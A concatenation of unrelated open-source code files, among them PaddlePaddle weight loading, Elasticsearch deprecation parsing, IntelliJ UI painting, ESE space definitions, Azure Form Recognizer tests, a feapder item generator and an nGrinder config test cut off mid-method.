= -1 matched_keys = {} result_state_dict = {} for model_id, weight_id in enumerate(max_id): if weight_id == -1: continue model_key = model_keys[model_id] weight_key = weight_keys[weight_id] weight_value = weight_state_dict[weight_key] model_value_shape = list(model_state_dict[model_key].shape) if list(weight_value.shape) != model_value_shape: print( 'The shape {} in pretrained weight {} is unmatched with ' 'the shape {} in model {}. 
And the weight {} will not be ' 'loaded'.format(weight_value.shape, weight_key, model_value_shape, model_key, weight_key)) continue assert model_key not in result_state_dict result_state_dict[model_key] = weight_value if weight_key in matched_keys: raise ValueError('Ambiguity weight {} loaded, it matches at least ' '{} and {} in the model'.format( weight_key, model_key, matched_keys[ weight_key])) matched_keys[weight_key] = model_key return result_state_dict def _strip_postfix(path): path, ext = os.path.splitext(path) assert ext in ['', '.pdparams', '.pdopt', '.pdmodel'], \ "Unknown postfix {} from weights".format(ext) return path def load_pretrain_weight(model, pretrain_weight): path = _strip_postfix(pretrain_weight) if not (os.path.isdir(path) or os.path.isfile(path) or os.path.exists(path + '.pdparams')): raise ValueError("Model pretrain path `{}` does not exists. " "If you don't want to load pretrain model, " "please delete `pretrain_weights` field in " "config file.".format(path)) model_dict = model.state_dict() weights_path = path + '.pdparams' param_state_dict = paddle.load(weights_path) param_state_dict = match_state_dict(model_dict, param_state_dict) model.set_dict(param_state_dict) print('Finish loading model weights: {}'.format(weights_path)) def load_weights(model, weights): start_epoch = 0 load_pretrain_weight(model, weights) print("Load weights {} to start training".format(weights))
1,667
1,125
/* * Licensed to Elasticsearch under one or more contributor * license agreements. See the NOTICE file distributed with * this work for additional information regarding copyright * ownership. Elasticsearch licenses this file to you under * the Apache License, Version 2.0 (the "License"); you may * not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, * software distributed under the License is distributed on an * "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY * KIND, either express or implied. See the License for the * specific language governing permissions and limitations * under the License. */ package org.elasticsearch.client.migration; import org.elasticsearch.common.Nullable; import org.elasticsearch.common.ParseField; import org.elasticsearch.common.xcontent.ConstructingObjectParser; import org.elasticsearch.common.xcontent.XContentParser; import java.io.IOException; import java.util.ArrayList; import java.util.HashMap; import java.util.List; import java.util.Locale; import java.util.Map; import java.util.Objects; public class DeprecationInfoResponse { private static final ParseField CLUSTER_SETTINGS = new ParseField("cluster_settings"); private static final ParseField NODE_SETTINGS = new ParseField("node_settings"); private static final ParseField INDEX_SETTINGS = new ParseField("index_settings"); private static final ParseField ML_SETTINGS = new ParseField("ml_settings"); private final List<DeprecationIssue> clusterSettingsIssues; private final List<DeprecationIssue> nodeSettingsIssues; private final Map<String, List<DeprecationIssue>> indexSettingsIssues; private final List<DeprecationIssue> mlSettingsIssues; public DeprecationInfoResponse(List<DeprecationIssue> clusterSettingsIssues, List<DeprecationIssue> nodeSettingsIssues, Map<String, List<DeprecationIssue>> indexSettingsIssues, 
List<DeprecationIssue> mlSettingsIssues) { this.clusterSettingsIssues = Objects.requireNonNull(clusterSettingsIssues, "cluster settings issues cannot be null"); this.nodeSettingsIssues = Objects.requireNonNull(nodeSettingsIssues, "node settings issues cannot be null"); this.indexSettingsIssues = Objects.requireNonNull(indexSettingsIssues, "index settings issues cannot be null"); this.mlSettingsIssues = Objects.requireNonNull(mlSettingsIssues, "ml settings issues cannot be null"); } public List<DeprecationIssue> getClusterSettingsIssues() { return clusterSettingsIssues; } public List<DeprecationIssue> getNodeSettingsIssues() { return nodeSettingsIssues; } public Map<String, List<DeprecationIssue>> getIndexSettingsIssues() { return indexSettingsIssues; } public List<DeprecationIssue> getMlSettingsIssues() { return mlSettingsIssues; } private static List<DeprecationIssue> parseDeprecationIssues(XContentParser parser) throws IOException { List<DeprecationIssue> issues = new ArrayList<>(); XContentParser.Token token = null; while ((token = parser.nextToken()) != XContentParser.Token.END_ARRAY) { if (token == XContentParser.Token.START_OBJECT) { issues.add(DeprecationIssue.PARSER.parse(parser, null)); } } return issues; } public static DeprecationInfoResponse fromXContent(XContentParser parser) throws IOException { Map<String, List<DeprecationIssue>> indexSettings = new HashMap<>(); List<DeprecationIssue> clusterSettings = new ArrayList<>(); List<DeprecationIssue> nodeSettings = new ArrayList<>(); List<DeprecationIssue> mlSettings = new ArrayList<>(); String fieldName = null; XContentParser.Token token; while ((token = parser.nextToken()) != XContentParser.Token.END_OBJECT) { if (token == XContentParser.Token.FIELD_NAME) { fieldName = parser.currentName(); } else if (CLUSTER_SETTINGS.getPreferredName().equals(fieldName)) { clusterSettings.addAll(parseDeprecationIssues(parser)); } else if (NODE_SETTINGS.getPreferredName().equals(fieldName)) { 
nodeSettings.addAll(parseDeprecationIssues(parser)); } else if (ML_SETTINGS.getPreferredName().equals(fieldName)) { mlSettings.addAll(parseDeprecationIssues(parser)); } else if (INDEX_SETTINGS.getPreferredName().equals(fieldName)) { // parse out the key/value pairs while ((token = parser.nextToken()) != XContentParser.Token.END_OBJECT) { String key = parser.currentName(); List<DeprecationIssue> value = parseDeprecationIssues(parser); if (value.size() > 0) { // only add indices that contain deprecation issues indexSettings.put(key, value); } } } } return new DeprecationInfoResponse(clusterSettings, nodeSettings, indexSettings, mlSettings); } @Override public boolean equals(Object o) { if (this == o) return true; if (o == null || getClass() != o.getClass()) return false; DeprecationInfoResponse that = (DeprecationInfoResponse) o; return Objects.equals(clusterSettingsIssues, that.clusterSettingsIssues) && Objects.equals(nodeSettingsIssues, that.nodeSettingsIssues) && Objects.equals(mlSettingsIssues, that.mlSettingsIssues) && Objects.equals(indexSettingsIssues, that.indexSettingsIssues); } @Override public int hashCode() { return Objects.hash(clusterSettingsIssues, nodeSettingsIssues, indexSettingsIssues, mlSettingsIssues); } @Override public String toString() { return clusterSettingsIssues.toString() + ":" + nodeSettingsIssues.toString() + ":" + indexSettingsIssues.toString() + ":" + mlSettingsIssues.toString(); } /** * Information about deprecated items */ public static class DeprecationIssue { private static final ParseField LEVEL = new ParseField("level"); private static final ParseField MESSAGE = new ParseField("message"); private static final ParseField URL = new ParseField("url"); private static final ParseField DETAILS = new ParseField("details"); static final ConstructingObjectParser<DeprecationIssue, Void> PARSER = new ConstructingObjectParser<>("deprecation_issue", true, a -> new DeprecationIssue(Level.fromString((String) a[0]), (String) a[1], (String) a[2], 
(String) a[3])); static { PARSER.declareString(ConstructingObjectParser.constructorArg(), LEVEL); PARSER.declareString(ConstructingObjectParser.constructorArg(), MESSAGE); PARSER.declareString(ConstructingObjectParser.constructorArg(), URL); PARSER.declareString(ConstructingObjectParser.optionalConstructorArg(), DETAILS); } public enum Level { WARNING, CRITICAL ; public static Level fromString(String value) { return Level.valueOf(value.toUpperCase(Locale.ROOT)); } @Override public String toString() { return name().toLowerCase(Locale.ROOT); } } private Level level; private String message; private String url; private String details; public DeprecationIssue(Level level, String message, String url, @Nullable String details) { this.level = level; this.message = message; this.url = url; this.details = details; } public Level getLevel() { return level; } public String getMessage() { return message; } public String getUrl() { return url; } public String getDetails() { return details; } @Override public boolean equals(Object o) { if (this == o) { return true; } if (o == null || getClass() != o.getClass()) { return false; } DeprecationIssue that = (DeprecationIssue) o; return Objects.equals(level, that.level) && Objects.equals(message, that.message) && Objects.equals(url, that.url) && Objects.equals(details, that.details); } @Override public int hashCode() { return Objects.hash(level, message, url, details); } } }
3,482
634
<filename>platform/platform-impl/src/com/intellij/ui/plaf/beg/BegScrollBarUI.java /* * Copyright 2000-2009 JetBrains s.r.o. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package com.intellij.ui.plaf.beg; import com.intellij.util.ui.UIUtil; import javax.swing.*; import javax.swing.plaf.ComponentUI; import javax.swing.plaf.basic.BasicScrollBarUI; import java.awt.*; public class BegScrollBarUI extends BasicScrollBarUI { public static ComponentUI createUI(JComponent c) { return new BegScrollBarUI(); } protected void paintThumb(Graphics g, JComponent c, Rectangle thumbBounds) { if (thumbBounds.isEmpty() || !scrollbar.isEnabled()){ return; } int w = thumbBounds.width; int h = thumbBounds.height; g.translate(thumbBounds.x, thumbBounds.y); g.setColor(thumbDarkShadowColor); // g.drawRect(0, 0, w - 1, h - 1); UIUtil.drawLine(g, 0, 1, 0, h - 2); //left UIUtil.drawLine(g, 1, 0, w - 2, 0); //top UIUtil.drawLine(g, w - 1, 1, w - 1, h - 2); //right UIUtil.drawLine(g, 1, h - 1, w - 2, h - 1); //bottom // g.setColor(thumbColor); g.setColor(new Color(247, 243, 239)); g.fillRect(1, 1, w - 2, h - 2); // g.setColor(thumbHighlightColor); // g.setColor(Color.darkGray); // g.drawLine(1, 1, 1, h - 2); // g.drawLine(2, 1, w - 3, 1); // g.setColor(thumbLightShadowColor); // g.drawLine(2, h - 2, w - 2, h - 2); // g.drawLine(w - 2, 1, w - 2, h - 3); g.translate(-thumbBounds.x, -thumbBounds.y); } protected void paintTrack(Graphics g, JComponent c, Rectangle trackBounds) { g.setColor(trackColor); 
g.fillRect(trackBounds.x, trackBounds.y, trackBounds.width, trackBounds.height); if (trackHighlight == DECREASE_HIGHLIGHT){ paintDecreaseHighlight(g); } else if (trackHighlight == INCREASE_HIGHLIGHT){ paintIncreaseHighlight(g); } } }
954
803
<filename>dev/ese/src/inc/_space.hxx // Copyright (c) Microsoft Corporation. // Licensed under the MIT License. #ifndef _SPACE_H_INCLUDED #define _SPACE_H_INCLUDED /*PERSISTED*/ typedef enum class SpacePool : ULONG { // Explicit Pools - except the 0 / AvailExtLegacyGeneralPool, these are stored/persisted // explicitly in the byte at front of 5-byte avail pool key. MinPool = 0x00, AvailExtLegacyGeneralPool = 0x00, // General / Legacy Free Pool. ContinuousPool = 0x01, // Reserved for contiguous allocations. ShelvedPool = 0x02, // Shelved page (available space beyond EOF, which can't be used). MaxPool, // Virtual Pools - these pools exist by the context in where the extent was found, and only used to // communicate this fact out the space APIs. They are not persisted. PrimaryExt = 0x00010000, // Used to mark an extent that is within the primary extent. OwnedTreeAvail = 0x00020000, // Available pages reserved for use to split (i.e. in spbuf) the Owned Extents Tree. AvailTreeAvail = 0x00030000, // Available pages reserved for use to split (i.e. in spbuf) the Avail Extents Tree. } spp; static_assert( 0 == (ULONG)spp::AvailExtLegacyGeneralPool, "Persisted and so must be immutable" ); static_assert( 1 == (ULONG)spp::ContinuousPool, "Persisted and so must be immutable" ); static_assert( 2 == (ULONG)spp::ShelvedPool, "Persisted and so must be immutable" ); inline BOOL FSPIValidExplicitSpacePool( SpacePool spp ) { return ( ( spp::MinPool <= spp ) && ( spp < spp::MaxPool ) ); }; inline const WCHAR * const WszPoolName( _In_ const SpacePool spp ) { switch( spp ) { case spp::AvailExtLegacyGeneralPool: return L"Gen"; case spp::ContinuousPool: return L"Cont"; case spp::ShelvedPool: return L"Shvd"; case spp::PrimaryExt: return L"Pri"; case spp::OwnedTreeAvail: return L"OeRes"; case spp::AvailTreeAvail: return L"AeRes"; } Assert( fFalse ); if ( spp == spp::MaxPool ) { // A special case of unknown. But you shouldn't be asking for the name of this, it // doesn't really have one. 
return L"UnknMax"; } return L"Unkn"; } // Incrementors for SpacePool (i.e. ++SpacePool and SpacePool++) INLINE SpacePool& operator++( SpacePool &spp ) { // The value you're incrementing is in the normal range, right? Assert( ( spp::MinPool <= spp ) && ( spp::MaxPool > spp) ); using IntType = typename std::underlying_type<SpacePool>::type; spp = static_cast<SpacePool>( static_cast<IntType>(spp) + 1 ); return spp; } INLINE SpacePool operator++( SpacePool &spp, int ) { SpacePool result = spp; ++spp; return result; } #ifndef SPACE_ONLY_DIAGNOSTIC_CONSTANTS // internal space functions called by recovery // VOID SPIInitPgnoFDP( FUCB *pfucb, CSR *pcsr, const SPACE_HEADER& sph ); VOID SPIPerformCreateMultiple( FUCB *pfucb, CSR *pcsrFDP, CSR *pcsrOE, CSR *pcsrAE, PGNO pgnoLast, CPG cpgPrimary ); VOID SPICreateExtentTree( FUCB *pfucb, CSR *pcsr, PGNO pgnoLast, CPG cpgExtent, BOOL fAvail ); ERR ErrSPICreateSingle( FUCB *pfucb, CSR *pcsr, const PGNO pgnoParent, const PGNO pgnoFDP, const OBJID objidFDP, CPG cpgPrimary, const BOOL fUnique, const ULONG fPageFlags, const DBTIME dbtime ); VOID SPIConvertGetExtentinfo( FUCB *pfucb, CSR *pcsrRoot, SPACE_HEADER *psph, EXTENTINFO *rgext, INT *piextMac ); VOID SPIConvertCalcExtents( const SPACE_HEADER& sph, const PGNO pgnoFDP, EXTENTINFO *rgext, INT *pcext ); VOID SPIPerformConvert( FUCB *pfucb, CSR *pcsrRoot, CSR *pcsrAE, CSR *pcsrOE, SPACE_HEADER *psph, PGNO pgnoSecondaryFirst, CPG cpgSecondary, EXTENTINFO *rgext, INT iextMac ); ERR ErrSPIOpenAvailExt( PIB *ppib, FCB *pfcb, FUCB **ppfucbAE ); ERR ErrSPIOpenOwnExt( PIB *ppib, FCB *pfcb, FUCB **ppfucbOE ); ERR ErrSPIGetExtentInfo( __in const FUCB *pfucb, __out PGNO *ppgnoLast, __out CPG *pcpgSize, __out SpacePool *psppPool ); ERR ErrSPIGetExtentInfo( __in const KEYDATAFLAGS *pkdf, __out PGNO *ppgnoLast, __out CPG *pcpgSize, __out SpacePool *psppPool ); ERR ErrSPITrimUpdateDatabaseHeader( const IFMP ifmp ); ERR ErrSPIREPAIRValidateSpaceNode( __in const KEYDATAFLAGS * pkdf, __out PGNO * 
ppgnoLast, __out CPG * pcpgExtent, __out SpacePool * sppPool ); const CPG cpgSmallFDP = 16; // count of owned pages below which an FDP const CPG cpgSmallGrow = 4; // minimum count of pages to grow a small FDP const CPG cpgSmallDbSpaceSize = 254; // use small DB alloc policies, while DB is smaller than this const PGNO pgnoSmallDbSpaceStart = 128; // use small DB alloc policies, when allocation starts in this area of DB const CPG cpgSmallSpaceAvailMost = 32; // maximum number of pages allocatable from single extent space format const CPG cpgMultipleExtentConvert = 2; // minimum pages to preallocate when converting to multiple extent // (enough for OE/AE) const CPG cpgMaxRootPageSplit = 2; // max. theoretical pages required to satisfy split on single-level tree const CPG cpgPrefRootPageSplit = 2; // preferred pages to satisfy split on single-level tree const CPG cpgMaxParentOfLeafRootSplit = 3; // max. theoretical pages required to satisfy split on 2-level tree const CPG cpgPrefParentOfLeafRootSplit = 8; // preferred pages to satisfy split on 2-level tree const CPG cpgMaxSpaceTreeSplit = 4; // max. theoretical pages required to satisfy space tree split (because max. depth is 4) const CPG cpgPrefSpaceTreeSplit = 16; // preferred pages to satisfy space tree split #endif // SPACE_ONLY_DIAGNOSTIC_CONSTANTS #endif // _SPACE_H_INCLUDED
3,254
579
<reponame>nilyibo/eRPC #pragma once namespace mica { namespace table { template <class StaticConfig> /** * @param key_hash The hash of the key computed using mica::util::hash * @param key The key to get() * @param out_value Pointer to a buffer to copy the value to. The buffer should * have space for StaticConfig::kValSize bytes */ Result FixedTable<StaticConfig>::get(uint64_t key_hash, const ft_key_t& key, char* out_value) const { uint32_t bucket_index = calc_bucket_index(key_hash); const Bucket* bucket = get_bucket(bucket_index); while (true) { uint32_t version_start = read_version_begin(bucket); const Bucket* located_bucket; size_t item_index = find_item_index(bucket, key, &located_bucket); if (item_index == StaticConfig::kBucketCap) { if (version_start != read_version_end(bucket)) continue; /* Try again */ stat_inc(&Stats::get_notfound); return Result::kNotFound; } uint8_t* _val = get_value(located_bucket, item_index); ::mica::util::memcpy<8>(out_value, _val, val_size); if (version_start != read_version_end(bucket)) continue; /* Try again */ stat_inc(&Stats::get_found); break; } return Result::kSuccess; } } }
480
2,728
<filename>sdk/formrecognizer/azure-ai-formrecognizer/tests/test_receipt.py<gh_stars>1000+ # coding=utf-8 # ------------------------------------ # Copyright (c) Microsoft Corporation. # Licensed under the MIT License. # ------------------------------------ import pytest import functools from io import BytesIO from datetime import date, time from azure.ai.formrecognizer import FormRecognizerClient, FormContentType, FormRecognizerApiVersion from testcase import FormRecognizerTest from preparers import GlobalClientPreparer as _GlobalClientPreparer from preparers import FormRecognizerPreparer GlobalClientPreparerV2 = functools.partial(_GlobalClientPreparer, FormRecognizerClient) class TestReceiptFromStream(FormRecognizerTest): @FormRecognizerPreparer() @GlobalClientPreparerV2() def test_passing_enum_content_type_v2(self, client): with open(self.receipt_png, "rb") as fd: myfile = fd.read() poller = client.begin_recognize_receipts( myfile, content_type=FormContentType.IMAGE_PNG ) result = poller.result() assert result is not None @FormRecognizerPreparer() @GlobalClientPreparerV2() def test_damaged_file_bytes_fails_autodetect_content_type(self, client): damaged_pdf = b"\x50\x44\x46\x55\x55\x55" # doesn't match any magic file numbers with self.assertRaises(ValueError): poller = client.begin_recognize_receipts( damaged_pdf ) @FormRecognizerPreparer() @GlobalClientPreparerV2() # TODO should there be a v3 version of this test? 
def test_damaged_file_bytes_io_fails_autodetect(self, client): damaged_pdf = BytesIO(b"\x50\x44\x46\x55\x55\x55") # doesn't match any magic file numbers with self.assertRaises(ValueError): poller = client.begin_recognize_receipts( damaged_pdf ) @FormRecognizerPreparer() @GlobalClientPreparerV2() def test_passing_bad_content_type_param_passed(self, client): with open(self.receipt_jpg, "rb") as fd: myfile = fd.read() with self.assertRaises(ValueError): poller = client.begin_recognize_receipts( myfile, content_type="application/jpeg" ) @FormRecognizerPreparer() @GlobalClientPreparerV2() def test_passing_unsupported_url_content_type(self, client): with self.assertRaises(TypeError): poller = client.begin_recognize_receipts( "https://badurl.jpg", content_type="application/json" ) @FormRecognizerPreparer() @GlobalClientPreparerV2() def test_receipt_jpg_include_field_elements(self, client): with open(self.receipt_jpg, "rb") as fd: receipt = fd.read() poller = client.begin_recognize_receipts(receipt, include_field_elements=True) result = poller.result() assert len(result) == 1 receipt = result[0] self.assertFormPagesHasValues(receipt.pages) for name, field in receipt.fields.items(): if field.value_type not in ["list", "dictionary"] and name != "ReceiptType": # receipt cases where value_data is None self.assertFieldElementsHasValues(field.value_data.field_elements, receipt.page_range.first_page_number) assert receipt.fields.get("MerchantAddress").value, '123 Main Street Redmond == WA 98052' assert receipt.fields.get("MerchantName").value == 'Contoso' assert receipt.fields.get("MerchantPhoneNumber").value == '+19876543210' assert receipt.fields.get("Subtotal").value == 11.7 assert receipt.fields.get("Tax").value == 1.17 assert receipt.fields.get("Tip").value == 1.63 assert receipt.fields.get("Total").value == 14.5 assert receipt.fields.get("TransactionDate").value == date(year=2019, month=6, day=10) assert receipt.fields.get("TransactionTime").value == time(hour=13, 
minute=59, second=0) assert receipt.page_range.first_page_number == 1 assert receipt.page_range.last_page_number == 1 self.assertFormPagesHasValues(receipt.pages) receipt_type = receipt.fields.get("ReceiptType") assert receipt_type.confidence is not None assert receipt_type.value == 'Itemized' @FormRecognizerPreparer() @GlobalClientPreparerV2(client_kwargs={"api_version": FormRecognizerApiVersion.V2_0}) def test_receipt_locale_v2(self, client): with open(self.receipt_jpg, "rb") as fd: receipt = fd.read() with pytest.raises(ValueError) as e: client.begin_recognize_receipts(receipt, locale="en-US") assert "'locale' is only available for API version V2_1 and up" in str(e.value)
1,994
735
/** * Tencent is pleased to support the open source community by making DCache available. * Copyright (C) 2019 THL A29 Limited, a Tencent company. All rights reserved. * Licensed under the BSD 3-Clause License (the "License"); you may not use this file * except in compliance with the License. You may obtain a copy of the License at * * https://opensource.org/licenses/BSD-3-Clause * * Unless required by applicable law or agreed to in writing, software distributed under * the License is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, * either express or implied. See the License for the specific language governing permissions * and limitations under the License. */ #ifndef __PROXY_WRAPPER_H__ #define __PROXY_WRAPPER_H__ #include "framework/AdminReg.h" #include "servant/Application.h" class AdminRegProxyWrapper { public: typedef std::map<std::string, std::string> TARS_CONTEXT; explicit AdminRegProxyWrapper(const std::string &obj) : _adminProxy(Application::getCommunicator()->stringToProxy<AdminRegPrx>(obj)) { } virtual ~AdminRegProxyWrapper() = default; virtual void tars_timeout(int msecond) { _adminProxy->tars_timeout(msecond); } virtual tars::Int32 getServerState(const std::string &application, const std::string &serverName, const std::string &nodeName, tars::ServerStateDesc &state, std::string &result, const map<string, string> &context = TARS_CONTEXT(), map<string, string> *pResponseContext = NULL) { return _adminProxy->getServerState( application, serverName, nodeName, state, result, context, pResponseContext); } protected: AdminRegProxyWrapper() = default; private: AdminRegPrx _adminProxy; }; class RouterClientWrapper { public: explicit RouterClientWrapper(const std::string &obj) : _routerClientPrx(Application::getCommunicator()->stringToProxy<RouterClientPrx>(obj)) { } virtual ~RouterClientWrapper() = default; virtual void tars_timeout(int msecond) { _routerClientPrx->tars_timeout(msecond); } protected: RouterClientWrapper() = 
default; private: RouterClientPrx _routerClientPrx; }; #endif // __PROXY_WRAPPER_H__
945
2,151
<filename>Study/google-databinding/src/main/java/android/databinding/test/independentlibrary/LibraryAdapter.java /* * Copyright (C) 2015 The Android Open Source Project * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. */ package android.databinding.test.independentlibrary; import android.databinding.BindingAdapter; import android.view.View; public class LibraryAdapter { @BindingAdapter("myTagAttr") public static void set(View view, String someTag) { view.setTag(someTag); } }
286
876
<reponame>mkdir700/feapder # -*- coding: utf-8 -*- """ Created on 2018-08-28 17:38:43 --------- @summary: 创建item --------- @author: Boris @email: <EMAIL> """ import getpass import os import feapder.utils.tools as tools from feapder import setting from feapder.db.mysqldb import MysqlDB from .create_init import CreateInit def deal_file_info(file): file = file.replace("{DATE}", tools.get_current_date()) file = file.replace("{USER}", getpass.getuser()) return file class CreateItem: def __init__(self): self._db = MysqlDB() self._create_init = CreateInit() def select_columns(self, table_name): # sql = 'SHOW COLUMNS FROM ' + table_name sql = f"SELECT COLUMN_NAME, COLUMN_TYPE, IS_NULLABLE, COLUMN_DEFAULT, EXTRA, COLUMN_KEY, COLUMN_COMMENT FROM INFORMATION_SCHEMA.Columns WHERE table_name = '{table_name}' and table_schema = '{setting.MYSQL_DB}'" columns = self._db.find(sql) return columns def select_tables_name(self, tables_name): """ @summary: --------- @param tables_name: 一类tables 如 qidian* --------- @result: """ sql = f"select table_name from information_schema.tables where table_name like '{tables_name}' and table_schema = '{setting.MYSQL_DB}'" tables_name = self._db.find(sql) return tables_name def convert_table_name_to_hump(self, table_name): """ @summary: 格式化表明为驼峰格式 --------- @param table: --------- @result: """ table_hump_format = "" words = table_name.split("_") for word in words: table_hump_format += word.capitalize() # 首字母大写 return table_hump_format def get_item_template(self): template_path = os.path.abspath( os.path.join(__file__, "../../../templates/item_template.tmpl") ) with open(template_path, "r", encoding="utf-8") as file: item_template = file.read() return item_template def create_item(self, item_template, columns, table_name, support_dict): table_name_hump_format = self.convert_table_name_to_hump(table_name) # 组装 类名 item_template = item_template.replace("${item_name}", table_name_hump_format) if support_dict: item_template = 
item_template.replace("${command}", table_name + " 1") else: item_template = item_template.replace("${command}", table_name) item_template = item_template.replace("${table_name}", table_name) # 组装 属性 propertys = "" for column in columns: column_name = column[0] column_type = column[1] is_nullable = column[2] column_default = column[3] column_extra = column[4] column_key = column[5] column_comment = column[6] try: column_default = None if column_default == "NULL" else column_default value = ( "kwargs.get('{column_name}')".format(column_name=column_name) if support_dict else ( column_default != "CURRENT_TIMESTAMP" and column_default or None ) and eval(column_default) ) except: value = ( "kwargs.get('{column_name}')".format(column_name=column_name) if support_dict else ( column_default != "CURRENT_TIMESTAMP" and column_default or None ) and column_default ) if column_extra == "auto_increment" or column_default is not None: propertys += f"# self.{column_name} = {value}" else: if value is None or isinstance(value, (float, int)) or support_dict: propertys += f"self.{column_name} = {value}" else: propertys += f"self.{column_name} = '{value}'" if column_comment: propertys += f" # {column_comment}" propertys += "\n" + " " * 8 item_template = item_template.replace("${propertys}", propertys.strip()) item_template = deal_file_info(item_template) return item_template def save_template_to_file(self, item_template, table_name): item_file = table_name + "_item.py" if os.path.exists(item_file): confirm = input("%s 文件已存在 是否覆盖 (y/n). 
" % item_file) if confirm != "y": print("取消覆盖 退出") return with open(item_file, "w", encoding="utf-8") as file: file.write(item_template) print("\n%s 生成成功" % item_file) self._create_init.create() def create(self, tables_name, support_dict): input_tables_name = tables_name tables_name = self.select_tables_name(tables_name) if not tables_name: print(tables_name) tip = "mysql数据库中无 %s 表 " % input_tables_name raise KeyError(tip) for table_name in tables_name: table_name = table_name[0] columns = self.select_columns(table_name) item_template = self.get_item_template() item_template = self.create_item( item_template, columns, table_name, support_dict ) self.save_template_to_file(item_template, table_name)
2,782
14,668
// Copyright 2016 The Chromium Authors. All rights reserved.
// Use of this source code is governed by a BSD-style license that can be
// found in the LICENSE file.

#ifndef THIRD_PARTY_BLINK_RENDERER_CORE_WORKERS_THREADED_OBJECT_PROXY_BASE_H_
#define THIRD_PARTY_BLINK_RENDERER_CORE_WORKERS_THREADED_OBJECT_PROXY_BASE_H_

#include "third_party/blink/renderer/bindings/core/v8/source_location.h"
#include "third_party/blink/renderer/core/core_export.h"
#include "third_party/blink/renderer/core/messaging/message_port.h"
#include "third_party/blink/renderer/core/workers/worker_reporting_proxy.h"
#include "third_party/blink/renderer/platform/heap/persistent.h"

namespace blink {

// Forward declarations; only pointer/handle types are used below.
class ParentExecutionContextTaskRunners;
class ThreadedMessagingProxyBase;

// The base proxy class to talk to a DedicatedWorker or *Worklet object on the
// main thread via the ThreadedMessagingProxyBase from a worker thread. This is
// created and destroyed on the main thread, and used on the worker thread.
// ThreadedMessagingProxyBase always outlives this proxy.
class CORE_EXPORT ThreadedObjectProxyBase : public WorkerReportingProxy {
  USING_FAST_MALLOC(ThreadedObjectProxyBase);

 public:
  // Non-copyable: instances are owned singletons tied to one messaging proxy.
  ThreadedObjectProxyBase(const ThreadedObjectProxyBase&) = delete;
  ThreadedObjectProxyBase& operator=(const ThreadedObjectProxyBase&) = delete;
  ~ThreadedObjectProxyBase() override = default;

  // Reports whether the worker still has pending activity.
  // NOTE(review): presumably forwarded to the messaging proxy on the parent
  // context thread — implementation not visible here, confirm in the .cc file.
  void ReportPendingActivity(bool has_pending_activity);

  // WorkerReportingProxy overrides.
  void CountFeature(WebFeature) override;
  void ReportConsoleMessage(mojom::ConsoleMessageSource,
                            mojom::ConsoleMessageLevel,
                            const String& message,
                            SourceLocation*) override;
  void DidCloseWorkerGlobalScope() override;
  void DidTerminateWorkerThread() override;

 protected:
  explicit ThreadedObjectProxyBase(ParentExecutionContextTaskRunners*);

  // Returns a weak reference to the owning messaging proxy; subclasses supply
  // the concrete proxy type.
  virtual CrossThreadWeakPersistent<ThreadedMessagingProxyBase>
  MessagingProxyWeakPtr() = 0;
  ParentExecutionContextTaskRunners* GetParentExecutionContextTaskRunners();

 private:
  // Used to post a task to ThreadedMessagingProxyBase on the parent context
  // thread.
  CrossThreadPersistent<ParentExecutionContextTaskRunners>
      parent_execution_context_task_runners_;
};

}  // namespace blink

#endif  // THIRD_PARTY_BLINK_RENDERER_CORE_WORKERS_THREADED_OBJECT_PROXY_BASE_H_
803
1,531
/*
 * Licensed under the Apache License, Version 2.0 (the "License");
 * you may not use this file except in compliance with the License.
 * You may obtain a copy of the License at
 *
 *     http://www.apache.org/licenses/LICENSE-2.0
 *
 * Unless required by applicable law or agreed to in writing, software
 * distributed under the License is distributed on an "AS IS" BASIS,
 * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
 * See the License for the specific language governing permissions and
 * limitations under the License.
 */
package org.ngrinder.infra.config;

import org.junit.Before;
import org.junit.Test;
import org.ngrinder.common.constant.ClusterConstants;
import org.ngrinder.common.constant.ControllerConstants;
import org.ngrinder.common.model.Home;
import org.ngrinder.common.util.PropertiesWrapper;
import org.springframework.test.util.ReflectionTestUtils;

import java.io.File;
import java.util.Properties;

import static org.hamcrest.MatcherAssert.assertThat;
import static org.hamcrest.Matchers.*;
import static org.mockito.Mockito.mock;
import static org.mockito.Mockito.when;

/**
 * Unit tests for {@code Config}, exercised through the {@code MockConfig}
 * test double. Verifies home-directory resolution, dev-mode interaction with
 * plugin support and security, and extended (cluster) property loading.
 */
public class ConfigTest implements ControllerConstants, ClusterConstants {

	private MockConfig config;

	@Before
	public void before() {
		// Marks the JVM as running under unit test so Config skips
		// environment-dependent initialization.
		System.setProperty("unit-test", "");
		config = new MockConfig();
		config.init();
	}

	@Test
	public void testDefaultHome() {
		// By default the nGrinder home is ~/.ngrinder with a "plugins" subdir.
		Home home = config.getHome();
		File oracle = new File(System.getProperty("user.home"), ".ngrinder");
		assertThat(home.getDirectory(), is(oracle));
		assertThat(home.getPluginsDirectory(), is(new File(oracle, "plugins")));
	}

	@Test
	public void testGetMonitorPort() {
		// A non-zero monitor port must be configured out of the box.
		int port = config.getMonitorPort();
		assertThat(port, not(0));
	}

	@Test
	public void testTestMode() {
		PropertiesWrapper wrapper = mock(PropertiesWrapper.class);
		config.setControllerProperties(wrapper);
		// Plugin support is off when the plugin_support property is false,
		// regardless of dev_mode.
		// NOTE(review): the original comment claimed "pluginsupport is true, it
		// should be true", but the stub below returns false for both flags. The
		// (dev_mode=false, plugin_support=true) combination is never exercised
		// in this test — confirm intent and add that case if it was meant here.
		when(wrapper.getPropertyBoolean(PROP_CONTROLLER_DEV_MODE)).thenReturn(false);
